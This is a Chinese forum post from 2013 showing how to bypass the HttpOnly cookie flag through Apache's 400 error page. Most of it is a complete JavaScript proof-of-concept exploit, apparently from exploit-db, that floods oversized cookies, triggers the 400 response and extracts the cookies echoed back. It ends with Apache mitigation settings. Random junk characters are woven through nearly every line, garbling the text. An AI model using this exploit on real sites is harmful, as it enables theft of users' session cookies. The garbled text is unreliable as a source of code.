很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。/ y$ j" i8 k. v; e
0 n8 x* b) t+ ~. I7 z, C
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:9 ]) t5 r! ~9 Q1 N5 q" Y2 M
; G. U- I8 b$ ~( S3 J# ` q
2 b0 @0 `4 a5 g# G' ]
// http://www.exploit-db.com/exploits/18442/
$ o Y; ^% \: w3 C) H- Ufunction setCookies (good) {
0 N* h9 e) M" L+ V, N* G// Construct string for cookie value
; x5 }1 }: h6 y( `0 @- l( k2 Wvar str = "";7 e9 }- r2 M/ a6 l7 G" v
for (var i=0; i< 819; i++) {
" ]5 w3 F _/ I# G; C! ^7 t+ l2 Pstr += "x";% t# Z( l- s \! B6 S* p& a
}1 N. G# f$ Y, e; u+ T4 v
// Set cookies
- y7 K1 X# e$ M' Tfor (i = 0; i < 10; i++) {
- o: K& r9 z4 a: i* i" L6 ^' u3 U// Expire evil cookie) O9 N1 u% F1 ^! [
if (good) {
. L+ _+ y/ t: |# |var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
. A1 {' N, i% ?' S6 m}
2 C! F5 [6 y( g$ G; m/ M// Set evil cookie+ A* X& @# `8 [# p+ R: i/ t
else {: U, v2 G* u5 u. K% d( G
var cookie = "xss"+i+"="+str+";path=/";7 u- y8 D0 x4 U( N$ b! f2 m
}
% C# A9 d9 J/ c7 K2 P0 }- Idocument.cookie = cookie;
3 ]8 b1 C: a! k}1 R5 X, `: `0 B- k7 P7 e
}: y: r$ K0 z$ |0 ~& D
function makeRequest() {% p/ Y: V' N1 s
setCookies();
! C4 z$ n% H4 G! l1 S& f' Y' gfunction parseCookies () {
' N" _/ \; E2 @; g9 t4 _var cookie_dict = {};& `# a3 g( d* B
// Only react on 400 status0 P/ [: k( @+ Y8 x; R
if (xhr.readyState === 4 && xhr.status === 400) { x9 i8 y( p' a# m6 J7 \' q& K
// Replace newlines and match <pre> content
8 x3 y. I" O& g$ |' m0 E, S- Z! ]& wvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
6 N/ @7 @6 ^, r) s' k2 t$ @ Uif (content.length) {
) p7 }& T5 {5 ~- T// Remove Cookie: prefix
1 I2 F7 u1 N. e& H4 S9 l' K* I# i( zcontent = content[1].replace("Cookie: ", "");5 ?8 Q7 h* E6 t v! B% \0 M
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);1 c' \" I- R# H- b# p% b4 d
// Add cookies to object
2 n, u, Y! w7 f# x/ B Zfor (var i=0; i<cookies.length; i++) {
2 U+ v6 b, r* y+ |var s_c = cookies.split('=',2);( V4 |6 z0 T; T$ ]
cookie_dict[s_c[0]] = s_c[1];
" {" H3 u) i; P' \& m/ f6 G0 \}% z9 J0 P; [0 Z' T1 X: _0 V
}
" s% `, \2 X2 A. R F& J0 |// Unset malicious cookies; O( v P$ v: P4 G
setCookies(true);
# s0 n! p" \5 _5 ^ _$ j$ halert(JSON.stringify(cookie_dict));
3 V+ j/ {. o* u' Y0 W}& y3 O; E/ ]& L
}- ^! J8 |9 X/ t% m' @% t# F
// Make XHR request2 @5 i- z9 ~: V5 r
var xhr = new XMLHttpRequest();
; S8 B* R5 Q0 Q/ L% l. v4 dxhr.onreadystatechange = parseCookies;
- H! g) o8 X5 ^ d' V% mxhr.open("GET", "/", true);
7 M+ X3 ]6 c" k, L; l6 xxhr.send(null);/ m+ {! e- m4 P
}
! Z! z% l/ C# g3 TmakeRequest();
% E$ V& L; D! x. ~% s- k2 O) @# z8 t1 F; K9 b+ ^; x
你就能看见华丽丽的400错误包含着cookie信息。2 j3 C$ _3 z( t4 j* v
+ ?' I* b( _8 L3 _* S' v# S2 s下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#; W3 G( Y$ i# W7 W& H
+ h6 i4 S, _+ w% b8 g* p
修复方案:
8 [( ^2 S9 f- E6 p+ N/ V+ o; k4 _" t8 S. t
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下3 b/ S5 k7 q5 h* z5 X! y! @6 ^
# Y4 w' D( t6 R. p% y6 N4 h0 ?In the event of a problem or error, Apachecan be configured to do one of four things,
5 M3 s7 m$ i3 |0 T. f2 P! X6 M& S# G( O
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
; E j) H/ S- q: B2 J2. output acustomized message输出一段信息
- Z7 ^4 A, k; \3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 : Z* }6 v/ C* r5 W, _& m0 e
4. redirect to an external URL to handle theproblem/error转向一个外部URL% N x+ M$ I t# X9 H
& r: A: f% l2 P" C& M
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容! r4 O0 q4 O- z1 x
/ W0 g: k% u1 `+ R! C1 R' S
Apache配置:1 E5 @, R9 I. _" N Z* _, x
8 k. V. S* _5 Y( u) v, w8 C. ~ErrorDocument400 " security test"; U( u l1 `: p) o- T+ @
1 J; o7 Q, I8 |, M/ N. @3 r当然,升级apache到最新也可:)。
K7 Z B ~9 {
?, O; N9 V6 U! Y- a6 x# @ {8 y9 z参考:http://httpd.apache.org/security/vulnerabilities_22.html) P; d" \0 j% ~; G% G
8 x$ _* g9 X2 P( H: p
|
发表于 2013-4-19 19:15:43
收藏
支持
反对